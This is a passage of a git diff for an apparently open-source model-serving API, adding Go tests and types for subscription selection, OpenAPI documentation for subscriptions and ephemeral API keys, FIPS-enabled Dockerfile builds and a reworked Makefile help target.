+						t.Errorf("subscription %q: expected displayName %q, got %q", sub.Name, expectedDisplayName, sub.DisplayName)
+					}
+				}
+			}
+
+			if tt.expectedDescriptions != nil {
+				for _, sub := range result {
+					expectedDescription := tt.expectedDescriptions[sub.Name]
+					if sub.Description != expectedDescription {
+						t.Errorf("subscription %q: expected description %q, got %q", sub.Name, expectedDescription, sub.Description)
+					}
+				}
+			}
+		})
+	}
+}
+
+func TestGetAllAccessible_ErrorHandling(t *testing.T) {
+	log := logger.New(false)
+
+	t.Run("requires groups or username", func(t *testing.T) {
+		lister := &fakeLister{subscriptions: []*unstructured.Unstructured{}}
+		selector := subscription.NewSelector(log, lister)
+
+		_, err := selector.GetAllAccessible(nil, "")
+		if err == nil {
+			t.Error("expected error when both groups and username are empty")
+		}
+		if err.Error() != "either groups or username must be provided" {
+			t.Errorf("unexpected error message: %v", err)
+		}
+	})
+}
+
+func TestSelectHighestPriority(t *testing.T) {
+	log := logger.New(false)
+
+	t.Run("picks highest priority", func(t *testing.T) {
+		lister := &fakeLister{subscriptions: []*unstructured.Unstructured{
+			createSubscription("low-sub", []string{"g1"}, nil, 10, defaultTestTokenRateLimit, "L", "d1"),
+			createSubscription("high-sub", []string{"g1"}, nil, 50, defaultTestTokenRateLimit, "H", "d2"),
+		}}
+		sel := subscription.NewSelector(log, lister)
+		got, err := sel.SelectHighestPriority([]string{"g1"}, "")
+		if err != nil {
+			t.Fatalf("SelectHighestPriority: %v", err)
+		}
+		if got.Name != "high-sub" {
+			t.Errorf("expected high-sub, got %q", got.Name)
+		}
+	})
+
+	t.Run("tie on priority uses maxLimit then name", func(t *testing.T) {
+		lister := &fakeLister{subscriptions: []*unstructured.Unstructured{
+			createSubscription("sub-a", []string{"g1"}, nil, 10, 10, "", ""),
+			createSubscription("sub-b", []string{"g1"}, nil, 10, 20, "", ""),
+		}}
+		sel := subscription.NewSelector(log, lister)
+		got, err := sel.SelectHighestPriority([]string{"g1"}, "")
+		if err != nil {
+			t.Fatalf("SelectHighestPriority: %v", err)
+		}
+		if got.Name != "sub-b" {
+			t.Errorf("expected sub-b (higher maxLimit), got %q", got.Name)
+		}
+	})
+
+	t.Run("tie on priority and maxLimit uses name asc", func(t *testing.T) {
+		lister := &fakeLister{subscriptions: []*unstructured.Unstructured{
+			createSubscription("zebra", []string{"g1"}, nil, 5, defaultTestTokenRateLimit, "", ""),
+			createSubscription("alpha", []string{"g1"}, nil, 5, defaultTestTokenRateLimit, "", ""),
+		}}
+		sel := subscription.NewSelector(log, lister)
+		got, err := sel.SelectHighestPriority([]string{"g1"}, "")
+		if err != nil {
+			t.Fatalf("SelectHighestPriority: %v", err)
+		}
+		if got.Name != "alpha" {
+			t.Errorf("expected alpha (lexicographic tie-break), got %q", got.Name)
+		}
+	})
+
+	t.Run("no accessible subscription", func(t *testing.T) {
+		lister := &fakeLister{subscriptions: []*unstructured.Unstructured{
+			createSubscription("other", []string{"other-group"}, nil, 10, defaultTestTokenRateLimit, "", ""),
+		}}
+		sel := subscription.NewSelector(log, lister)
+		_, err := sel.SelectHighestPriority([]string{"g1"}, "")
+		if err == nil {
+			t.Fatal("expected error")
+		}
+		var noSub *subscription.NoSubscriptionError
+		if !errors.As(err, &noSub) {
+			t.Fatalf("expected NoSubscriptionError, got %T %v", err, err)
+		}
+	})
+}
diff --git a/maas-api/internal/subscription/types.go b/maas-api/internal/subscription/types.go
index ae5511aec..ae67efc5f 100644
--- a/maas-api/internal/subscription/types.go
+++ b/maas-api/internal/subscription/types.go
@@ -5,6 +5,13 @@ type SelectRequest struct {
 	Groups                []string `json:"groups"`                                // User's group memberships (optional if username provided)
 	Username              string   `binding:"required"           json:"username"` // User's username
 	RequestedSubscription string   `json:"requestedSubscription"`                 // Optional explicit subscription name
+	RequestedModel        string   `json:"requestedModel"`                        // Optional model reference (format: namespace/name) to validate subscription includes this model
+}
+
+// ModelRef represents a model reference in a subscription.
+type ModelRef struct {
+	Namespace string `json:"namespace"` // Model namespace
+	Name      string `json:"name"`      // Model name
 }
 
 // SelectResponse contains the selected subscription details or error information.
@@ -12,6 +19,11 @@ type SelectRequest struct {
 type SelectResponse struct {
 	// Success fields (populated when selection succeeds)
 	Name           string            `json:"name,omitempty"`           // Subscription name
+	Namespace      string            `json:"namespace,omitempty"`      // Subscription namespace
+	DisplayName    string            `json:"displayName,omitempty"`    // Human-friendly display name for UI
+	Description    string            `json:"description,omitempty"`    // Subscription description
+	Priority       int32             `json:"priority,omitempty"`       // Subscription priority
+	ModelRefs      []ModelRefInfo    `json:"modelRefs,omitempty"`      // Model references with rate limits
 	OrganizationID string            `json:"organizationId,omitempty"` // Organization ID for billing
 	CostCenter     string            `json:"costCenter,omitempty"`     // Cost center for attribution
 	Labels         map[string]string `json:"labels,omitempty"`         // Additional tracking labels
@@ -21,6 +33,38 @@ type SelectResponse struct {
 	Message string `json:"message,omitempty"` // Human-readable error message
 }
 
+// SubscriptionInfo represents a subscription in list responses.
+// Contains everything from the MaaSSubscription spec except owner.
+type SubscriptionInfo struct {
+	SubscriptionIDHeader    string            `json:"subscription_id_header"`
+	SubscriptionDescription string            `json:"subscription_description"`
+	DisplayName             string            `json:"display_name,omitempty"`
+	Priority                int32             `json:"priority"`
+	ModelRefs               []ModelRefInfo    `json:"model_refs"`
+	OrganizationID          string            `json:"organization_id,omitempty"`
+	CostCenter              string            `json:"cost_center,omitempty"`
+	Labels                  map[string]string `json:"labels,omitempty"`
+}
+
+// ModelRefInfo represents a model reference with its rate limits.
+type ModelRefInfo struct {
+	Name            string           `json:"name"`
+	Namespace       string           `json:"namespace,omitempty"`
+	TokenRateLimits []TokenRateLimit `json:"token_rate_limits,omitempty"`
+	BillingRate     *BillingRate     `json:"billing_rate,omitempty"`
+}
+
+// TokenRateLimit defines a token rate limit.
+type TokenRateLimit struct {
+	Limit  int64  `json:"limit"`
+	Window string `json:"window"`
+}
+
+// BillingRate defines billing information.
+type BillingRate struct {
+	PerToken string `json:"per_token"`
+}
+
 // ErrorResponse represents an error response (deprecated - use SelectResponse instead).
 type ErrorResponse struct {
 	Error   string `json:"error"`   // Error code (e.g., "bad_request", "not_found")
diff --git a/maas-api/openapi3.yaml b/maas-api/openapi3.yaml
index ee9562a57..2ed9293de 100644
--- a/maas-api/openapi3.yaml
+++ b/maas-api/openapi3.yaml
@@ -4,7 +4,11 @@ info:
     description: Models as a Service Billing and Management API
     version: "1.0"
 servers:
-    - url: http://localhost:8080
+    - url: '{serverUrl}'
+      variables:
+        serverUrl:
+          default: http://localhost:8080
+          description: API server URL (e.g. https://maas-api.example.com)
 security:
   - bearerAuth: []
 paths:
@@ -30,41 +34,139 @@ paths:
             tags:
                 - models
             summary: Lists available large language models in OpenAI-compatible format
-            description: Lists available large language models in OpenAI-compatible format
+            description: |
+                Lists available large language models in OpenAI-compatible format.
+
+                Behavior depends on authentication method and headers:
+
+                **API key authentication** (Bearer sk-oai-*):
+                - Returns models available via the subscription bound to the API key at mint time
+                - The X-MaaS-Subscription header is automatically injected by the gateway from the key's subscription
+                - No manual headers required
+
+                **User token authentication** (Bearer without sk-oai- prefix):
+                - Default (no X-MaaS-Subscription header): Returns all models from all accessible subscriptions
+                - With X-MaaS-Subscription header: Returns models from the specified subscription only (allows users to scope their query)
+
+                The X-MaaS-Subscription header provides flexible filtering for user tokens while API keys are automatically scoped.
             operationId: models#list_llms
+            parameters:
+                - in: header
+                  name: X-MaaS-Subscription
+                  schema:
+                      type: string
+                  required: false
+                  description: |
+                      (User tokens only) Filter models to a specific subscription by name.
+                      When provided with a user token, behaves like an API key request - returns only models from that subscription.
+                      For API keys, this header is automatically injected by the gateway and should not be manually specified.
+                  example: premium-subscription
             responses:
+                "401":
+                    description: Unauthorized. Missing or invalid Authorization header.
+                    content:
+                        application/json:
+                            schema:
+                                $ref: '#/components/schemas/ErrorResponse'
+                            example:
+                                error:
+                                    message: "Authorization required"
+                                    type: "authentication_error"
+                "403":
+                    description: |
+                        Forbidden. Subscription access error. Possible cases:
+                        - API key has no subscription bound (invalid state)
+                        - Access denied to the subscription bound to the API key
+                        - Subscription not found
+                        - User has no accessible subscriptions
+                    content:
+                        application/json:
+                            schema:
+                                $ref: '#/components/schemas/ErrorResponse'
+                            examples:
+                                no_subscription_bound:
+                                    summary: API key has no subscription bound
+                                    value:
+                                        error:
+                                            message: "API key has no subscription bound"
+                                            type: "permission_error"
+                                access_denied:
+                                    summary: Access denied to subscription
+                                    value:
+                                        error:
+                                            message: "access denied to subscription"
+                                            type: "permission_error"
+                                not_found:
+                                    summary: Subscription not found
+                                    value:
+                                        error:
+                                            message: "subscription not found"
+                                            type: "permission_error"
+                                no_subscription:
+                                    summary: No accessible subscriptions
+                                    value:
+                                        error:
+                                            message: "no subscription found for user"
+                                            type: "permission_error"
                 "200":
                     description: OK response.
                     content:
                         application/json:
                             schema:
                                 $ref: '#/components/schemas/ModelListResponse'
-                            example:
-                                object: list
-                                data:
-                                    - created: 1672531200
-                                      id: llama-2-7b-chat
-                                      object: model
-                                      owned_by: model-namespace
-                                      ready: true
-                                      url: https://api.example.com/v1/models/llama-2-7b-chat
-                                    - created: 1672531200
-                                      id: mistral-7b-instruct
-                                      object: model
-                                      owned_by: model-namespace
-                                      ready: true
-                                      url: https://api.example.com/v1/models/mistral-7b-instruct
-                                    - created: 1672531200
-                                      id: granite-8b-code-instruct
-                                      object: model
-                                      owned_by: model-namespace
-                                      ready: false
-                                    - created: 1672531200
-                                      id: llama-3-8b-instruct
-                                      object: model
-                                      owned_by: model-namespace
-                                      ready: true
-                                      url: https://api.example.com/v1/models/llama-3-8b-instruct
+                            examples:
+                                single_subscription:
+                                    summary: Response with single subscription (default)
+                                    value:
+                                        object: list
+                                        data:
+                                            - created: 1672531200
+                                              id: llama-2-7b-chat
+                                              object: model
+                                              owned_by: model-namespace/llama-2-7b-chat
+                                              ready: true
+                                              url: https://api.example.com/v1/models/llama-2-7b-chat
+                                              kind: LLMInferenceService
+                                              subscriptions:
+                                                  - name: basic-subscription
+                                            - created: 1672531200
+                                              id: mistral-7b-instruct
+                                              object: model
+                                              owned_by: model-namespace/mistral-7b-instruct
+                                              ready: true
+                                              url: https://api.example.com/v1/models/mistral-7b-instruct
+                                              kind: LLMInferenceService
+                                              subscriptions:
+                                                  - name: basic-subscription
+                                aggregated_subscriptions:
+                                    summary: Response with X-MaaS-Return-All-Models (subscription aggregation)
+                                    value:
+                                        object: list
+                                        data:
+                                            - created: 1672531200
+                                              id: llama-2-7b-chat
+                                              object: model
+                                              owned_by: model-namespace/llama-2-7b-chat
+                                              ready: true
+                                              url: https://api.example.com/v1/models/llama-2-7b-chat
+                                              kind: LLMInferenceService
+                                              subscriptions:
+                                                  - name: basic-subscription
+                                                    displayName: Basic Tier
+                                                  - name: premium-subscription
+                                                    displayName: Premium Tier
+                                                    description: Premium subscription with higher rate limits
+                                            - created: 1672531200
+                                              id: granite-8b-code-instruct
+                                              object: model
+                                              owned_by: model-namespace/granite-8b-code-instruct
+                                              ready: true
+                                              url: https://api.example.com/v1/models/granite-8b-code-instruct
+                                              kind: LLMInferenceService
+                                              subscriptions:
+                                                  - name: premium-subscription
+                                                    displayName: Premium Tier
+                                                    description: Premium subscription with higher rate limits
                 "500":
                     description: Internal Server Error response.
                     content:
@@ -171,7 +273,7 @@ paths:
             tags:
                 - api-keys-v2
             summary: Create a new hash-based API key
-            description: Creates a new OpenAI-compatible API key (sk-oai-* format). Supports both permanent keys (no expiration) and expiring keys (with expiresIn parameter). The plaintext key is shown ONLY ONCE at creation time and cannot be retrieved again.
+            description: Creates a new OpenAI-compatible API key (sk-oai-* format). Name is required for regular keys but optional for ephemeral keys. If expiresIn is not provided, defaults to API_KEY_MAX_EXPIRATION_DAYS (default 90 days) for regular keys, or 1 hour for ephemeral keys. The plaintext key is shown ONLY ONCE at creation time and cannot be retrieved again.
             operationId: api-keys-v2#create
             requestBody:
                 required: true
@@ -179,30 +281,45 @@ paths:
                     application/json:
                         schema:
                             type: object
-                            required:
-                                - name
                             properties:
                                 name:
                                     type: string
-                                    description: Human-readable name for the API key
+                                    description: Human-readable name for the API key. Required for regular keys, optional for ephemeral keys.
                                 description:
                                     type: string
                                     description: Optional description
                                 expiresIn:
                                     type: string
-                                    description: Optional expiration duration (e.g., "30d", "90d", "1h"). Omit for permanent key.
+                                    description: Expiration duration (e.g., "30d", "90d", "1h"). Defaults to API_KEY_MAX_EXPIRATION_DAYS for regular keys, 1 hour for ephemeral keys.
+                                ephemeral:
+                                    type: boolean
+                                    description: Create a short-lived programmatic key. Defaults to false. Ephemeral keys have 1hr default and maximum expiration (enforced), and optional name.
+                                    default: false
+                                subscription:
+                                    type: string
+                                    description: Optional MaaSSubscription resource name to bind to this key. When omitted, the user's highest-priority accessible subscription is used (spec.priority, descending).
                         examples:
-                            permanent_key:
-                                summary: Permanent API key (no expiration)
+                            default_expiration:
+                                summary: API key with default expiration (API_KEY_MAX_EXPIRATION_DAYS)
                                 value:
-                                    name: my-permanent-key
+                                    name: my-api-key
                                     description: Production API key
-                            expiring_key:
-                                summary: Expiring API key (90 days)
+                            custom_expiration:
+                                summary: API key with custom expiration (30 days)
                                 value:
-                                    name: my-expiring-key
-                                    description: 90-day test key
-                                    expiresIn: 90d
+                                    name: my-short-lived-key
+                                    description: 30-day test key
+                                    expiresIn: 30d
+                            with_subscription:
+                                summary: API key bound to specific subscription
+                                value:
+                                    name: my-premium-key
+                                    description: Key for premium subscription
+                                    subscription: premium-subscription
+                            ephemeral_key:
+                                summary: Ephemeral key for programmatic use (1hr expiration)
+                                value:
+                                    ephemeral: true
             responses:
                 "201":
                     description: Created response.
@@ -210,6 +327,15 @@ paths:
                         application/json:
                             schema:
                                 type: object
+                                required:
+                                    - key
+                                    - keyPrefix
+                                    - id
+                                    - name
+                                    - subscription
+                                    - createdAt
+                                    - expiresAt
+                                    - ephemeral
                                 properties:
                                     key:
                                         type: string
@@ -223,6 +349,9 @@ paths:
                                     name:
                                         type: string
                                         description: Name of the key
+                                    subscription:
+                                        type: string
+                                        description: MaaSSubscription name bound to this key at creation time
                                     createdAt:
                                         type: string
                                         format: date-time
@@ -230,9 +359,16 @@ paths:
                                     expiresAt:
                                         type: string
                                         format: date-time
-                                        description: Expiration timestamp (RFC3339), omitted for permanent keys
+                                        description: Expiration timestamp (RFC3339)
+                                    ephemeral:
+                                        type: boolean
+                                        description: Whether this is a short-lived programmatic key
                 "400":
-                    description: Bad Request response.
+                    description: |
+                        Bad Request. Includes validation errors and subscription resolution failures
+                        for API key creation. Subscription-related failures use a single error code
+                        (`invalid_subscription`) and message so clients cannot distinguish
+                        not-found, access denied, or no default subscription.
                 "401":
                     description: Unauthorized response.
     /v1/api-keys/search:
@@ -240,7 +376,7 @@ paths:
             tags:
                 - api-keys-v2
             summary: Search and filter API keys
-            description: Search API keys with flexible filtering, sorting, and pagination. Supports filtering by username (admin-only), status, sorting by multiple fields, and pagination.
+            description: Search API keys with flexible filtering, sorting, and pagination. Supports filtering by username (admin-only), status, sorting by multiple fields, and pagination. Ephemeral keys are excluded by default.
             operationId: api-keys-v2#search
             requestBody:
                 required: false
@@ -261,6 +397,10 @@ paths:
                                                 type: string
                                                 enum: [active, revoked, expired]
                                             description: Filter by status (active, revoked, expired). Defaults to active only.
+                                        includeEphemeral:
+                                            type: boolean
+                                            description: Include ephemeral keys in results. Defaults to false.
+                                            default: false
                                 sort:
                                     type: object
                                     properties:
@@ -286,7 +426,7 @@ paths:
                                             default: 0
                         examples:
                             default_search:
-                                summary: Default search (active keys, newest first)
+                                summary: Default search (active keys, newest first, excludes ephemeral)
                                 value:
                                     filters:
                                         status: ["active"]
@@ -308,6 +448,12 @@ paths:
                                     pagination:
                                         limit: 20
                                         offset: 0
+                            include_ephemeral:
+                                summary: Include ephemeral keys in search
+                                value:
+                                    filters:
+                                        status: ["active"]
+                                        includeEphemeral: true
             responses:
                 "200":
                     description: OK response.
@@ -320,13 +466,17 @@ paths:
                                 data:
                                     - id: key_abc123
                                       name: my-production-key
+                                      subscription: premium-subscription
                                       creationDate: "2024-01-15T10:30:00Z"
                                       status: active
+                                      ephemeral: false
                                     - id: key_def456
                                       name: my-test-key
+                                      subscription: basic-subscription
                                       creationDate: "2024-01-14T09:15:00Z"
                                       expirationDate: "2024-04-14T09:15:00Z"
                                       status: active
+                                      ephemeral: false
                                 has_more: true
                 "400":
                     description: Bad Request. Invalid search parameters.
@@ -445,14 +595,81 @@ paths:
                             example:
                                 id: key_abc123
                                 name: my-production-key
+                                subscription: premium-subscription
                                 creationDate: "2024-01-15T10:30:00Z"
                                 status: revoked
+                                ephemeral: false
                 "404":
                     description: Not Found. API key not found.
                 "401":
                     description: Unauthorized response.
                 "403":
                     description: Forbidden. User trying to revoke another user's key.
+    /v1/subscriptions:
+        get:
+            tags:
+                - subscriptions
+            summary: List all subscriptions the authenticated user has access to
+            description: Returns all MaaSSubscription resources the user has access to based on group membership or username. Useful for UIs that need to show all user subscriptions.
+            operationId: subscriptions#list
+            responses:
+                "200":
+                    description: OK response.
+                    content:
+                        application/json:
+                            schema:
+                                type: array
+                                items:
+                                    $ref: '#/components/schemas/SubscriptionListItem'
+                            example:
+                                - subscription_id_header: free-tier
+                                  subscription_description: Free Tier
+                                - subscription_id_header: premium
+                                  subscription_description: Premium Plan
+                "500":
+                    description: Internal Server Error response.
+                    content:
+                        application/json:
+                            schema:
+                                $ref: '#/components/schemas/ErrorResponse'
+    /v1/model/{model-id}/subscriptions:
+        get:
+            tags:
+                - subscriptions
+            summary: List subscriptions the user has access to for a specific model
+            description: Returns MaaSSubscription resources the user has access to that include the specified model in their modelRefs. The model-id parameter must be the MaaSModelRef resource name (e.g. "facebook-opt-125m-simulated"), not the served model name (e.g. "facebook/opt-125m") or the route path. Useful for populating a subscription dropdown when the user must specify X-MaaS-Subscription.
+            operationId: subscriptions#list_for_model
+            parameters:
+                - in: path
+                  name: model-id
+                  schema:
+                      type: string
+                  required: true
+                  description: The MaaSModelRef resource name (e.g. "facebook-opt-125m-simulated"). This is the name of the MaaSModelRef, not the served model ID or the route path.
+            responses:
+                "200":
+                    description: OK response.
+                    content:
+                        application/json:
+                            schema:
+                                type: array
+                                items:
+                                    $ref: '#/components/schemas/SubscriptionListItem'
+                            example:
+                                - subscription_id_header: premium
+                                  subscription_description: Premium Plan
+                "400":
+                    description: Bad Request. Missing model-id parameter.
+                    content:
+                        application/json:
+                            schema:
+                                $ref: '#/components/schemas/ErrorResponse'
+                "500":
+                    description: Internal Server Error response.
+                    content:
+                        application/json:
+                            schema:
+                                $ref: '#/components/schemas/ErrorResponse'
 components:
   securitySchemes:
     bearerAuth:
@@ -466,9 +683,20 @@ components:
             type: object
             properties:
                 error:
-                    type: string
-                    description: Error message
-                    example: Failed to retrieve models
+                    type: object
+                    description: Error details
+                    properties:
+                        message:
+                            type: string
+                            description: Human-readable error message
+                            example: Failed to retrieve models
+                        type:
+                            type: string
+                            description: Error type classification
+                            example: server_error
+                    required:
+                        - message
+                        - type
             required:
                 - error
         
@@ -496,34 +724,27 @@ components:
                     items:
                         $ref: '#/components/schemas/Model'
                     description: Array of model objects
-                    example:
-                        - created: 1672531200
-                          id: llama-2-7b-chat
-                          object: model
-                          owned_by: model-namespace
-                          ready: true
-                          url: https://api.example.com/v1/models/llama-2-7b-chat
-                        - created: 1672531200
-                          id: mistral-7b-instruct
-                          object: model
-                          owned_by: model-namespace
-                          ready: true
-                          url: https://api.example.com/v1/models/mistral-7b-instruct
             example:
                 object: list
                 data:
                     - created: 1672531200
                       id: llama-2-7b-chat
                       object: model
-                      owned_by: model-namespace
+                      owned_by: model-namespace/llama-2-7b-chat
                       ready: true
                       url: https://api.example.com/v1/models/llama-2-7b-chat
+                      kind: LLMInferenceService
+                      subscriptions:
+                          - name: basic-subscription
                     - created: 1672531200
                       id: mistral-7b-instruct
                       object: model
-                      owned_by: model-namespace
+                      owned_by: model-namespace/mistral-7b-instruct
                       ready: true
                       url: https://api.example.com/v1/models/mistral-7b-instruct
+                      kind: LLMInferenceService
+                      subscriptions:
+                          - name: basic-subscription
             required:
                 - object
                 - data
@@ -547,8 +768,8 @@ components:
                     format: int64
                 owned_by:
                     type: string
-                    description: The organization that owns the model
-                    example: model-namespace
+                    description: "The namespace and MaaSModelRef name (format: namespace/name)"
+                    example: model-namespace/llama-2-7b-chat
                 ready:
                     type: boolean
                     description: Model ready status
@@ -557,19 +778,84 @@ components:
                     type: string
                     description: Model URL (optional)
                     example: https://api.example.com/v1/models/llama-2-7b-chat
+                modelDetails:
+                    type: object
+                    description: Additional model metadata from MaaSModelRef annotations
+                    properties:
+                        displayName:
+                            type: string
+                            description: Human-readable display name (from openshift.io/display-name annotation)
+                            example: Llama 2 7B Chat
+                        description:
+                            type: string
+                            description: Model description (from openshift.io/description annotation)
+                            example: A large language model optimized for chat use cases
+                        genaiUseCase:
+                            type: string
+                            description: GenAI use case category (from opendatahub.io/genai-use-case annotation)
+                            example: chat
+                        contextWindow:
+                            type: string
+                            description: Context window size (from opendatahub.io/context-window annotation)
+                            example: "4096"
+                kind:
+                    type: string
+                    description: The model reference kind (e.g., "LLMInferenceService")
+                    example: LLMInferenceService
+                subscriptions:
+                    type: array
+                    items:
+                        $ref: '#/components/schemas/SubscriptionInfo'
+                    description: |
+                        Array of subscriptions that provide access to this model.
+                        When X-MaaS-Return-All-Models is used, models accessible via multiple
+                        subscriptions will have multiple entries in this array.
+                    example:
+                        - name: premium-subscription
+                          displayName: Premium Tier
+                          description: Premium subscription with higher rate limits
             example:
                 created: 1672531200
                 id: llama-2-7b-chat
                 object: model
-                owned_by: model-namespace
+                owned_by: model-namespace/llama-2-7b-chat
                 ready: true
                 url: https://api.example.com/v1/models/llama-2-7b-chat
+                modelDetails:
+                    displayName: Llama 2 7B Chat
+                    description: A large language model optimized for chat use cases
+                    genaiUseCase: chat
+                    contextWindow: "4096"
+                kind: LLMInferenceService
+                subscriptions:
+                    - name: premium-subscription
+                      displayName: Premium Tier
+                      description: Premium subscription with higher rate limits
             required:
                 - id
                 - object
                 - created
                 - owned_by
                 - ready
+
+        # Subscription metadata
+        SubscriptionInfo:
+            type: object
+            properties:
+                name:
+                    type: string
+                    description: The subscription name
+                    example: premium-subscription
+                displayName:
+                    type: string
+                    description: Human-readable display name for the subscription
+                    example: Premium Tier
+                description:
+                    type: string
+                    description: Description of the subscription
+                    example: Premium subscription with higher rate limits
+            required:
+                - name
         
         # Tier lookup
         TierLookupRequest:
@@ -614,6 +900,93 @@ components:
                 - error
                 - message
 
+        # Subscription info for list responses
+        SubscriptionListItem:
+            type: object
+            properties:
+                subscription_id_header:
+                    type: string
+                    description: Subscription name to use in the X-MaaS-Subscription header
+                    example: premium
+                subscription_description:
+                    type: string
+                    description: Human-readable description (from description annotation, falls back to display-name, then name)
+                    example: Premium Plan
+                display_name:
+                    type: string
+                    description: Display name from the openshift.io/display-name annotation
+                    example: Premium
+                priority:
+                    type: integer
+                    format: int32
+                    description: Subscription priority (higher = higher priority)
+                    example: 10
+                model_refs:
+                    type: array
+                    description: Model references with rate limits
+                    items:
+                        $ref: '#/components/schemas/ModelRefInfo'
+                organization_id:
+                    type: string
+                    description: Organization identifier for metering and billing
+                    example: premium-org
+                cost_center:
+                    type: string
+                    description: Cost center for usage attribution
+                    example: ai-team
+                labels:
+                    type: object
+                    additionalProperties:
+                        type: string
+                    description: Additional labels for tracking and metrics
+                    example:
+                        env: production
+            required:
+                - subscription_id_header
+                - subscription_description
+                - priority
+                - model_refs
+
+        ModelRefInfo:
+            type: object
+            properties:
+                name:
+                    type: string
+                    description: Name of the MaaSModelRef
+                    example: free-model-ref
+                namespace:
+                    type: string
+                    description: Namespace where the MaaSModelRef lives
+                    example: llm
+                token_rate_limits:
+                    type: array
+                    items:
+                        type: object
+                        properties:
+                            limit:
+                                type: integer
+                                format: int64
+                                description: Maximum number of tokens allowed
+                                example: 100
+                            window:
+                                type: string
+                                description: "Time window (e.g., 1m, 1h, 24h)"
+                                example: 1m
+                        required:
+                            - limit
+                            - window
+                billing_rate:
+                    type: object
+                    properties:
+                        per_token:
+                            type: string
+                            description: Cost per token
+                            example: "0.001"
+                    required:
+                        - per_token
+            required:
+                - name
+
         # API Key metadata
         ApiKey:
             type: object
@@ -630,6 +1003,9 @@ components:
                 username:
                     type: string
                     description: Username that owns this API key
+                subscription:
+                    type: string
+                    description: MaaSSubscription name bound to this key at creation time
                 groups:
                     type: array
                     items:
@@ -642,7 +1018,7 @@ components:
                 expirationDate:
                     type: string
                     format: date-time
-                    description: When the API key expires (empty for permanent keys)
+                    description: When the API key expires
                 status:
                     type: string
                     enum: [active, revoked, expired]
@@ -651,11 +1027,15 @@ components:
                     type: string
                     format: date-time
                     description: When the API key was last used for validation
+                ephemeral:
+                    type: boolean
+                    description: Whether this is a short-lived programmatic token
             required:
                 - id
                 - name
                 - creationDate
                 - status
+                - ephemeral
 
         # API Key List Response (paginated)
         ApiKeyListResponse:
@@ -685,5 +1065,7 @@ tags:
       description: "\U0001F916 Model management service"
     - name: tiers
       description: "\U0001F3F7️Tier lookup service"
+    - name: subscriptions
+      description: Subscription listing service
     - name: health
       description: ❤️ Health check service
diff --git a/maas-controller/Dockerfile b/maas-controller/Dockerfile
index c1dfb750f..24e5edbd9 100644
--- a/maas-controller/Dockerfile
+++ b/maas-controller/Dockerfile
@@ -4,7 +4,8 @@ ARG BUILDPLATFORM
 ARG TARGETPLATFORM
 
 FROM --platform=$BUILDPLATFORM registry.access.redhat.com/ubi9/go-toolset:$GOLANG_VERSION AS builder
-ARG CGO_ENABLED=0
+ARG CGO_ENABLED=1
+ARG GOEXPERIMENT=strictfipsruntime
 ARG TARGETOS
 ARG TARGETARCH
 
@@ -15,7 +16,7 @@ COPY . .
 
 USER root
 
-RUN CGO_ENABLED=${CGO_ENABLED} GOOS=${TARGETOS:-linux} GOARCH=${TARGETARCH:-amd64} go build -a -trimpath -ldflags="-s -w" -o manager ./cmd/manager
+RUN CGO_ENABLED=${CGO_ENABLED} GOEXPERIMENT=${GOEXPERIMENT} GOOS=${TARGETOS:-linux} GOARCH=${TARGETARCH:-amd64} go build -a -trimpath -ldflags="-s -w" -o manager ./cmd/manager
 
 FROM --platform=$TARGETPLATFORM registry.access.redhat.com/ubi9/ubi-minimal:latest
 
diff --git a/maas-controller/Dockerfile.konflux b/maas-controller/Dockerfile.konflux
index f1756c1f8..6bc9e5acf 100644
--- a/maas-controller/Dockerfile.konflux
+++ b/maas-controller/Dockerfile.konflux
@@ -4,7 +4,8 @@ ARG BUILDPLATFORM
 ARG TARGETPLATFORM
 
 FROM --platform=$BUILDPLATFORM registry.access.redhat.com/ubi9/go-toolset@sha256:799cc027d5ad58cdc156b65286eb6389993ec14c496cf748c09834b7251e78dc AS builder
-ARG CGO_ENABLED=0
+ARG CGO_ENABLED=1
+ARG GOEXPERIMENT=strictfipsruntime
 ARG TARGETOS
 ARG TARGETARCH
 
@@ -14,7 +15,7 @@ RUN go mod download
 COPY . .
 
 USER root
-RUN CGO_ENABLED=${CGO_ENABLED} GOOS=${TARGETOS:-linux} GOARCH=${TARGETARCH:-amd64} go build -a -trimpath -ldflags="-s -w" -o manager ./cmd/manager
+RUN CGO_ENABLED=${CGO_ENABLED} GOEXPERIMENT=${GOEXPERIMENT} GOOS=${TARGETOS:-linux} GOARCH=${TARGETARCH:-amd64} go build -a -trimpath -ldflags="-s -w" -o manager ./cmd/manager
 
 FROM --platform=$TARGETPLATFORM registry.access.redhat.com/ubi9/ubi-minimal@sha256:80f3902b6dcb47005a90e14140eef9080ccc1bb22df70ee16b27d5891524edb2
 
diff --git a/maas-controller/Makefile b/maas-controller/Makefile
index bf1fa248f..78f36a49c 100644
--- a/maas-controller/Makefile
+++ b/maas-controller/Makefile
@@ -1,46 +1,74 @@
 # MaaS Controller Makefile
 # Build and deploy the MaaS control plane (MaaSModelRef, MaaSAuthPolicy, MaaSSubscription)
 
-.PHONY: build run test tidy install uninstall image-build image-push docker-build generate manifests verify-codegen help
-
-help:
-	@echo "MaaS Controller make targets:"
-	@echo "  make build        - build manager binary to bin/manager"
-	@echo "  make run          - build and run manager locally"
-	@echo "  make test         - run tests"
-	@echo "  make generate     - generate deepcopy code for API types"
-	@echo "  make manifests    - generate CRD manifests"
-	@echo "  make install      - apply deployment/base/maas-controller/default (CRDs, RBAC, deployment)"
-	@echo "  make uninstall    - delete deployment/base/maas-controller/default resources"
-	@echo "  make verify-codegen - run generate + manifests and fail if files changed (CI check)"
-	@echo "  make image-build  - build container image (podman/buildah/docker); default IMAGE=quay.io/opendatahub/maas-controller"
-	@echo "  make image-push   - build and push image; override with IMAGE=... IMAGE_TAG=..."
+##@ General
+
+# The help target prints out all targets with their descriptions organized
+# beneath their categories. The categories are represented by '##@' and the
+# target descriptions by '##'. The awk command is responsible for reading the
+# entire set of makefiles included in this invocation, looking for lines of the
+# file as xyz: ## something, and then pretty-format the target and help. Then,
+# if there's a line with ##@ something, that gets pretty-printed as a category.
+# More info on the usage of ANSI control characters for terminal formatting:
+# https://en.wikipedia.org/wiki/ANSI_escape_code#SGR_parameters
+# More info on the awk command:
+# http://linuxcommand.org/lc3_adv_awk.php
+
+.PHONY: help
+help: ##	Display this help.
+	@awk 'BEGIN {FS = ":.*##"; printf "\nUsage:\n  make \033[36m<target>\033[0m\n"} /^[a-zA-Z_0-9-]+:.*?##/ { printf "  \033[36m%-15s\033[0m %s\n", $$1, $$2 } /^##@/ { printf "\n\033[1m%s\033[0m\n", substr($$0, 5) } ' $(MAKEFILE_LIST)
+	@echo ""
